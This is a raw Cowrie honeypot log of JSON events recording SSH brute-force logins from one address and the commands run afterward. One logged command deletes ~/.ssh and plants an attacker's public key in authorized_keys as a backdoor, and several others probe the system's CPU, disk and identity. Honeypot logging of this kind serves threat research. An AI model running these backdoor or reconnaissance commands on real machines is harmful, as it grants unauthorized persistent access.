{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:43.347814Z","src_ip":"212.227.235.229","session":"75283195644a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:44.126987Z","src_ip":"212.227.235.229","session":"75283195644a"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:44.301599Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:44.313255Z","src_ip":"212.227.235.229","session":"75283195644a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45756,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b1fd5418f02","protocol":"ssh","message":"New connection: 212.227.235.229:45756 (1.2.3.4:22) [session: 7b1fd5418f02]","sensor":"my-vps","timestamp":"2025-09-08T22:19:45.289461Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:45.290307Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:45.538511Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.login.success","username":"root","password":"Abcd_1234","message":"login attempt [root/Abcd_1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:46.533269Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"7.9","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:46.538295Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:47.100002Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:47.100717Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:47.101697Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:47.120427Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T22:19:47.121136Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:47.351224Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:47.373161Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:47.909378Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:19:47.910100Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:47.933383Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T22:19:47.933995Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:19:48.160431Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:48.161324Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45770,"dst_ip":"1.2.3.4","dst_port":22,"session":"a053f9442dc8","protocol":"ssh","message":"New connection: 212.227.235.229:45770 (1.2.3.4:22) [session: a053f9442dc8]","sensor":"my-vps","timestamp":"2025-09-08T22:19:48.408063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:48.408780Z","src_ip":"212.227.235.229","session":"a053f9442dc8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:48.657822Z","src_ip":"212.227.235.229","session":"a053f9442dc8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:49.130434Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:49.447787Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T22:19:49.448598Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:19:49.699687Z","src_ip":"212.227.235.229","session":"a053f9442dc8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:49.700911Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:50.950011Z","src_ip":"212.227.235.229","session":"a053f9442dc8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:51.206910Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T22:19:51.207638Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45778,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2cabebc1c58","protocol":"ssh","message":"New connection: 212.227.235.229:45778 (1.2.3.4:22) [session: a2cabebc1c58]","sensor":"my-vps","timestamp":"2025-09-08T22:19:51.209194Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:51.210030Z","src_ip":"212.227.235.229","session":"a2cabebc1c58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:51.461638Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:51.465193Z","src_ip":"212.227.235.229","session":"a2cabebc1c58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:51.981310Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T22:19:51.981993Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:52.236475Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:52.527256Z","src_ip":"212.227.235.229","session":"a2cabebc1c58"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:52.783711Z","src_ip":"212.227.235.229","session":"a2cabebc1c58"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:52.785408Z","src_ip":"212.227.235.229","session":"7b1fd5418f02"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:53.320972Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T22:19:53.321682Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:54.299140Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:54.572906Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T22:19:54.573614Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:55.547224Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:57.728622Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T22:19:57.729362Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:57.984814Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.closed","duration":"45.3","message":"Connection lost after 45.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:57.985965Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47441,"dst_ip":"1.2.3.4","dst_port":23,"session":"be475df35f74","protocol":"telnet","message":"New connection: 212.227.125.160:47441 (1.2.3.4:23) [session: be475df35f74]","sensor":"my-vps","timestamp":"2025-09-08T22:20:11.114642Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43428,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce37ae4c1900","protocol":"ssh","message":"New connection: 212.227.235.229:43428 (1.2.3.4:22) [session: ce37ae4c1900]","sensor":"my-vps","timestamp":"2025-09-08T22:20:15.958397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:15.959910Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:16.254879Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456~","message":"login attempt [root/Aa123456~] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:20:17.490233Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45890,"dst_ip":"1.2.3.4","dst_port":22,"session":"40d2f6bf5c34","protocol":"ssh","message":"New connection: 212.227.235.229:45890 (1.2.3.4:22) [session: 40d2f6bf5c34]","sensor":"my-vps","timestamp":"2025-09-08T22:20:17.565000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:17.565653Z","src_ip":"212.227.235.229","session":"40d2f6bf5c34"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:17.893862Z","src_ip":"212.227.235.229","session":"40d2f6bf5c34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:18.145977Z","src_ip":"212.227.235.229","session":"ce37ae4c1900"}
